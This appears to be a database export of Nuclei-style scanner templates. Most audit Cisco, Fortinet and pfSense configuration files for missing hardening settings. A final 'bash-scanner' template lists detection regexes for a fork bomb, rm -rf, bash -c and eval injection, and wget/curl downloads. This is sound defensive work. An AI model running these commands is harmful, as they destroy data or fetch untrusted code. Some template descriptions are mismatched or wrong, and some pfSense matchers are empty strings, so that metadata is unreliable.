4a0a00473045022100b3824610ba6b2026b8af411ad1f050590e6d7d443422e6018531dfd6afc4e2c202207791f1506db5b7ed7e28371cc10d6ec040f0e9a60f719c11ef68204c7d53b030:922c64590222798bb761d5b6d8e72950", "hash": "47606a78446cd086fd6aae982be29a05", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb4" }, "name": "configure-aaa-service.yaml", "content": "id: configure-aaa-service\n\ninfo:\n name: Cisco AAA Service Configuration - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco 
authentication, authorization and accounting (AAA) is not enabled in this configuration, because the aaa new-model command is absent. Without AAA, device logins fall back to line and enable passwords and cannot be centrally authenticated, authorized or audited through TACACS+ or RADIUS.\n reference:\n - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,audit,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"aaa new-model\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n\n# Enhanced by md on 2023/05/02\n# digest: 4a0a00473045022100b08ae4dfec8550c46d4d2a9947d69c8769894ccaeb677774e12b3c4565fcafb502206a0aff777a79e8632d80b73f9a9329e9b3edd08d8be2d30e3386d89ac9b70f35:922c64590222798bb761d5b6d8e72950", "hash": "a20e500f91646df408eed6f799aaf73f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb5" }, "name": "configure-service-timestamps-debug.yaml", "content": "id: configure-service-timestamps-debug\n\ninfo:\n name: Cisco Configure Service Timestamps for Debug - Detect\n author: pussycat0x\n severity: info\n description: |\n The configuration does not contain the service timestamps debug datetime msec show-timezone localtime command, so debug output is not timestamped and cannot be reliably correlated with other logs during an investigation. 
It's important to note that timestamps can be added to either debugging or logging messages independently.\n reference:\n - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,audit,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"service timestamps debug datetime msec show-timezone localtime\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n\n# Enhanced by md on 2023/05/02\n# digest: 4b0a00483046022100feb39453d1dcb37e56aab12a6aaa9223c2d6c6bf69f6f4562a6240a1ac9f0559022100cf2d34370c98f03d0f9a7ae5d0adfb7ed6afce5f6f9129c2e10df79daf0314b7:922c64590222798bb761d5b6d8e72950", "hash": "486b0e17261d09add8690b17a3365ccd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb6" }, "name": "configure-service-timestamps-logmessages.yaml", "content": "id: configure-service-timestamps-logmessages\n\ninfo:\n name: Cisco Configure Service Timestamps Log Messages - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco service timestamp configuration for log messages was not implemented.\n reference:\n - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,audit,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"service timestamps log datetime msec show-timezone localtime\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n\n# Enhanced by md on 2023/05/02\n# digest: 
4b0a00483046022100c0cb129cce9ac0411ef5079ca443c0825d38107983ac9adddc1b440fba342b00022100ce2df46bb2f4d0f2ea0ab49d8f2904548be89c8d24e1b5688bdae48942d9aef9:922c64590222798bb761d5b6d8e72950", "hash": "2c3dfeb5acbcc47110e879085f6187f7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb7" }, "name": "disable-ip-source-route.yaml", "content": "id: disable-ip-source-route\n\ninfo:\n name: Cisco Disable IP Source-Route - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco IP source-route functionality has been utilized in several attacks. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n remediation: Disable IP source-route where appropriate.\n reference:\n - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,file,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"no ip source-route\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n# digest: 490a00463044022043714e496a52c4e5fe911cf1b513eade243f568f1d04df11ffbdf6299e92c427022047e44b938e9b7ce54e67453056f915d622b735462692e5f78d1259d05cbe5f6a:922c64590222798bb761d5b6d8e72950", "hash": "14d4b59c67097d3d1df44f1671a56d80", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb8" }, "name": "disable-pad-service.yaml", "content": "id: disable-pad-service\n\ninfo:\n name: Cisco Disable PAD - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco PAD service has proven vulnerable to attackers. 
To reduce the risk of unauthorized access, organizations should implement a security policy restricting or disabling unnecessary access.\n reference:\n - http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,file,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"no service pad\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n# digest: 490a00463044022070f306accb37b7814673b232c0eead5da6b9f17e2ad29e4f76d58404ff0ea9e3022063cc46413c8f53d3222b0faa1513058c7918676b09420b6606f98bdb08086b5c:922c64590222798bb761d5b6d8e72950", "hash": "4c0e4fd9ffdd768cf29592725875ddc0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb9" }, "name": "enable-secret-for-user-and-password.yaml", "content": "id: enable-secret-for-user-and-password\n\ninfo:\n name: Enable and User Password with Secret\n author: pussycat0x\n severity: info\n description: |\n To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. 
Use the no form of this command to disable this service.\n reference:\n - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm\n tags: file,audit,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"enable secret\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n# digest: 4b0a00483046022100b93eaa86472a91e4cb3f4f368ca0bbb46f17dd05bf3d86f5898d0e2a6954f82b022100b6210c48f41b36aba9adb9ec0999b83944ca73c7996db8b69a442dd69372df9c:922c64590222798bb761d5b6d8e72950", "hash": "7e185fe2839633cf00e403a5682e8049", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cba" }, "name": "logging-enable.yaml", "content": "id: logging-enable\n\ninfo:\n name: Cisco Logging Enable - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco logging 'logging enable' enable command enforces the monitoring of technology risks for organizations' network devices.\n reference:\n - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,file,cisco,config-audit,cisco-switch\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"logging enable\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n\n# Enhanced by md on 2023/05/03\n# digest: 4a0a004730450220276f016c51a3f4cdd89c4c2468f6ce29ed3ed2967fc2fdf7af8bb2662410940b0221008acdae1b017dd53af2780a9d3bd87f930f7bd55acea47d4b40cdb65c91b54a0d:922c64590222798bb761d5b6d8e72950", "hash": "658e7ef8c74bf46dd7046a179953a6ea", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cbb" }, "name": "set-and-secure-passwords.yaml", "content": "id: 
set-and-secure-passwords\n\ninfo:\n name: Cisco Set and Secure Password - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco set and secure password functionality is recommended to control privilege level access. To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command.\n reference:\n - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-e1.html#wp3884449514\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,file,cisco,config-audit,cisco-switch\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"service password-encryption\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n\n# Enhanced by md on 2023/05/03\n# digest: 4b0a00483046022100efdfaccc895a5ecc59a52d4539a4c09b63d234684db78a580016862fb5e317600221009a3a6c7fb3111578da8bff93c055c86b6f51a0ac995ae2f78870298c49422e89:922c64590222798bb761d5b6d8e72950", "hash": "010d7f792a6f7901880f5ab88ec0ce87", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cbc" }, "name": "auto-usb-install.yaml", "content": "id: auto-usb-install\n\ninfo:\n name: Fortinet Auto USB Installation Enabled - Detect\n author: pussycat0x\n severity: info\n description: Via Fortinet Auto USB installation, an attacker with physical access to a FortiGate can load a new configuration or firmware using the USB port, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: 
audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set auto-install-config disable\"\n - \"set auto-install-image disable\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4a0a0047304502207705ba820df9f78c5d686bb2cf0a2945360c63e2774a2bd9984e2b676dfc3a71022100f9dc533ffa5f2fe96faee48a7249bf2982a55b89e7d5f40e7f49330d47dc5d2c:922c64590222798bb761d5b6d8e72950", "hash": "c31e11fa3bdc8476e058150dea20e95c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cbd" }, "name": "heuristic-scan.yaml", "content": "id: heuristic-scan\n\ninfo:\n name: Fortinet Heuristic Scanning not Configured - Detect\n author: pussycat0x\n severity: info\n description: |\n Fortinet heuristic scanning configuration is advised to thwart attacks. Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. 
A replacement message is forwarded to the recipient, and blocked files are quarantined if quarantine is enabled.\n reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"config antivirus heuristic\"\n - \"set mode block\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4b0a00483046022100f4ec56fac28c66a16f4465dc3f38dfa1e32914d9a9f4a920eecfcd7531fd8eb1022100ded6bebd35754564f8d3f44d45f442fd0e8b1bd377f5da1d2013659cc8eea484:922c64590222798bb761d5b6d8e72950", "hash": "6c2cf6483a2547427227ead03953c133", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cbe" }, "name": "inactivity-timeout.yaml", "content": "id: inactivity-timeout\n\ninfo:\n name: Fortinet Inactivity Timeout Not Implemented - Detect\n author: pussycat0x\n severity: info\n description: If Fortinet inactivity timeout functionality is disabled, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations within that window if the administrator is away from the computer.\n reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set admin-console-timeout\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: 
or\n\n# Enhanced by md on 2023/05/03\n# digest: 4a0a00473045022041387e7ef55b094494bcfb9a6eae4ff8ad3c74272b997521e525cfbbeccc90cf022100db5505a6eef5616090297755b5660c0a7365fbde04b2bf137704f64913258eff:922c64590222798bb761d5b6d8e72950", "hash": "547f5c2602623299b769b28048f698f4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cbf" }, "name": "maintainer-account.yaml", "content": "id: maintainer-account\n\ninfo:\n name: Fortinet Maintainer Account Not Implemented - Detect\n author: pussycat0x\n severity: info\n description: In Fortinet, if a FortiGate is compromised and the password is not recoverable, a maintainer account can be used by an administrator with physical access to log into CLI.\n reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set admin-maintainer\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4a0a0047304502210089379903b0135adfb1a8bd3e2d4a590950d73ab241cdceabd0c397e6912349f60220557b68a43baf7c7c7e01590b8751530c0f840c1ff27b2d604ee368501fb8a61e:922c64590222798bb761d5b6d8e72950", "hash": "6bd4c07491d75ecd0ff4c7fb1c722b25", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc0" }, "name": "password-policy.yaml", "content": "id: password-policy\n\ninfo:\n name: Fortinet Password Policy Not Set - Detect\n author: pussycat0x\n severity: info\n description: Fortinet administrative password policy is not set. 
Using this feature is recommended to ensure all administrators use secure passwords that meet organizations' requirements.\n reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: fortigate,config,audit,file,firewall\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"config system password-policy\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4a0a0047304502204e65bbfdaa2bfe99fe16885a24ff47c4949526d02fadc7b87f6c20a4ba08c4ca022100c0985aaaf07d38f38325fb6bbda5f5b5b2db068356432ff3cf67cb159110cd33:922c64590222798bb761d5b6d8e72950", "hash": "6bdfc5cf2e14058af104db724c98e582", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc1" }, "name": "remote-auth-timeout.yaml", "content": "id: remote-auth-timeout\n\ninfo:\n name: Fortinet Remote Authentication Timeout Not Set - Detect\n author: pussycat0x\n severity: info\n description: Fortinet remote authentication timeout functionality is recommended to be enabled. 
Lack of a set timeout can allow an attacker to act within that threshold if the administrator is away from the computer, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n reference:\n - https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set remoteauthtimeout\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 490a004630440220536fe3e2f19529faa2dad59b0925da645e04a7197e96304c47eb89df2f5f1a8e02202bc21cdd56a7d7194d1573306690289ba0306167ad2eb3cb9ca9728b83b919b2:922c64590222798bb761d5b6d8e72950", "hash": "75ec6bb5cef9aba9e795769b07c250ab", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc2" }, "name": "scp-admin.yaml", "content": "id: scp-admin\n\ninfo:\n name: Fortinet Admin-SCP Disabled - Detect\n author: pussycat0x\n severity: info\n description: Fortinet Admin-SCP functionality is recommended to be disabled by default. 
Enabling SCP allows download of the configuration file from the FortiGate as an alternative method of backing up the configuration file.\n reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set admin-scp enable\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4a0a00473045022066b03eab029db2877bcea75f43ae255dae8812134411e467f84b8487e9ec3c61022100d84b44b02b7c57bade8ec9df9cec76874296bd865c80b8af87e45f18e8350d1c:922c64590222798bb761d5b6d8e72950", "hash": "b96abff6598a5cab9bad19943fe07cd0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc3" }, "name": "strong-ciphers.yaml", "content": "id: strong-ciphers\n\ninfo:\n name: HTTPS/SSH Strong Ciphers Not Enabled\n author: pussycat0x\n severity: info\n description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish.\n reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set strong-crypto enable\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4b0a00483046022100c04b9bbf0bec674b8578767a5dc94cdc2101bdb316d13bdd54fb7da604f5e7c8022100d35a558a808abf032280bdb60e7c9091bc4a2d28966836c4af0f0ac583252b3a:922c64590222798bb761d5b6d8e72950", "hash": "d68a37d5c7e0585d73444645654b9b06", "level": 2, "time": "2024-05-17 23:39:44" }, { 
"_id": { "$oid": "66477a413521042ccf307cc4" }, "name": "configure-dns-server.yaml", "content": "id: configure-dns-server\n\ninfo:\n name: DNS Server Not Implemented - Detect\n author: pussycat0x\n severity: info\n description: |\n DNS is recommended to be configured over TLS. This prevents intermediate parties and potential attackers from viewing the content of DNS queries and can also assure that DNS is being provided by the expected DNS servers.\n reference: |\n https://docs.netgate.com/pfsense/en/latest/recipes/dns-over-tls.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: firewall,config,audit,pfsense,file\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n negative: true\n\n - type: word\n words:\n - \"\"\n - \"\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a00473045022033cb74c6b00552467f5bc077d514ea4991e3a3222666f07b004e0d7bd978098f022100a10c92466915077df2b21b37b18aabc5d0122bb34af9bec017432af9736b0238:922c64590222798bb761d5b6d8e72950", "hash": "fa2b69a65586cd7d4ad9242e09bb1b3b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc5" }, "name": "configure-session-timeout.yaml", "content": "id: configure-session-timeout\n\ninfo:\n name: PfSense Configure Sessions Timeout Not Set - Detect\n author: pussycat0x\n severity: info\n description: |\n Configure sessions timeout is recommended to be enabled. 
An indefinite or even long session timeout window can increase the risk of an attacker abusing abandoned sessions and potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n reference: |\n https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: firewall,config,audit,pfsense,file\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"0\"\n condition: or\n negative: true\n\n - type: word\n words:\n - \"\"\n - \"\"\n - \"\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 4b0a004830460221008eba08b85ba95940807021dd80e8d2aa75fabfbe6706871968b674720671fa85022100cc57c109bd39376341a80bf84d4c5ef3f2a6f396792ca7ea3876860f54cf38d6:922c64590222798bb761d5b6d8e72950", "hash": "d8c23d11a6f4e9fd797477cdf5045fce", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc6" }, "name": "enable-https-protocol.yaml", "content": "id: enable-https-protocol\n\ninfo:\n name: Pfsense Web Admin Management Portal HTTPS Not Set - Detect\n author: pussycat0x\n severity: info\n description: |\n PfSense Web Admin Management Portal is recommended to be accessible using only HTTPS protocol. 
HTTP transmits all data, including passwords, in clear text over the network and provides no assurance of the identity of the hosts involved, making it possible for an attacker to obtain sensitive information, modify data, and/or execute unauthorized operations.\n reference: |\n https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: firewall,config,audit,pfsense,file\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"https\"\n condition: and\n negative: true\n\n - type: word\n words:\n - \"\"\n - \"\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a0047304502202121bc19669faaa0f0e0fc8bc72138f3eb44eea7209ff5bbc2d8121f58350389022100d43403a09e74c0d72f54de7d9dad2e0af0f1fa4ba7ea551188dccde47e010856:922c64590222798bb761d5b6d8e72950", "hash": "0cf23942dab2cf43fa8d29aac046ab0d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc7" }, "name": "known-default-account.yaml", "content": "id: known-default-account\n\ninfo:\n name: PfSense Known Default Account - Detect\n author: pussycat0x\n severity: info\n description: |\n PfSense configured known default accounts are recommended to be deleted. In order to attempt access to known devices' platforms, an attacker can use the available database of the known default accounts for each platform or operating system. 
Known default accounts are often, but not limited to, 'admin'.\n reference: |\n - https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,pfsense\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"admin\"\n - \"\"\n - \"user-shell-access\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 490a00463044022063556ee4b394affce60a28ef8106e7bafe299aaee1d4e84e1e295562373442bd022068de7e8f0dbacab446bc723067113de16f48cb61438deb36b1fa2a0d79d9236b:922c64590222798bb761d5b6d8e72950", "hash": "708d20e25c0965a75a8de8cd2c591588", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc8" }, "name": "password-protected-consolemenu.yaml", "content": "id: password-protected-consolemenu\n\ninfo:\n name: PfSense Consolemenu Password Protection Not Implememnted - Detect\n author: pussycat0x\n severity: info\n description: |\n PfSense password protection via the Console Menu is recommended to be configured. 
An unattended computer with an open Console Menu session can allow an unauthorized user access to the firewall management.\n reference: |\n https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: firewall,config,audit,pfsense,file\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"1\"\n condition: or\n negative: true\n\n - type: word\n words:\n - \"\"\n - \"\"\n - \"\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 490a00463044022078bebe23791220eee7587337be7cdd8f3dc36ae8e2fffcb62e57b6d4697609af02202a015c2d5eacb159debb08f84abf1d1a158ded646676fd555d1eae7dfe17007a:922c64590222798bb761d5b6d8e72950", "hash": "faab151d051b4790c00cbb72b2684165", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc9" }, "name": "set-hostname.yaml", "content": "id: set-hostname\n\ninfo:\n name: PfSense Hostname Not Set - Detect\n author: pussycat0x\n severity: info\n description: |\n PfSense Hostname should be set so that other devices on the network can correctly identify it. 
The hostname is a unique identifier for the device.\n reference: |\n https://docs.netgate.com/pfsense/en/latest/config/general.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: firewall,config,audit,pfsense,file\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"\"\n - \"domain>\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 4b0a00483046022100ef138110a286e5da0fd75606e2bdd7a522477fa1a4cfd60452976fb5d96e8d97022100e02bb223d094d5b9546c6bf6fd8786ed0c6f4fd2c03c943d7073143b81c98e61:922c64590222798bb761d5b6d8e72950", "hash": "26383c8a69dbe268e4e7e3f009f03057", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cca" }, "name": "bash-scanner.yaml", "content": "id: bash-scanner\n\ninfo:\n name: Bash Scanner\n author: ransomsec\n severity: info\n description: Indicator for bash Dangerous Commands – You Should Never Execute on Linux\n reference:\n - https://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/\n - https://phoenixnap.com/kb/dangerous-linux-terminal-commands\n tags: bash,file,shell,sh\n\nfile:\n - extensions:\n - sh\n\n extractors:\n - type: regex\n name: fork-bomb\n regex:\n - \":(){:|:&};:\"\n\n - type: regex\n name: rm command found\n regex:\n - \"rm -(f|r)\"\n - \"rm -(fr|rf)\"\n\n - type: regex\n name: code injection\n regex:\n - \"/bin/(sh|bash) -\"\n - \"eval\"\n - \"echo -c\"\n - \"/bin/(sh|bash) -c\"\n - \"(sh|bash) -\"\n - \"(sh|bash) -c\"\n\n - type: regex\n name: file manipulation\n regex:\n - \"cat /dev/null >\"\n\n - type: regex\n name: unknown filedownload\n regex:\n - '(wget|curl) (https?|ftp|file)://[-A-Za-z0-9\\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\\+&@#/%=~_|]\\.[-A-Za-z0-9\\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\\+&@#/%=~_|]$'\n# digest: 
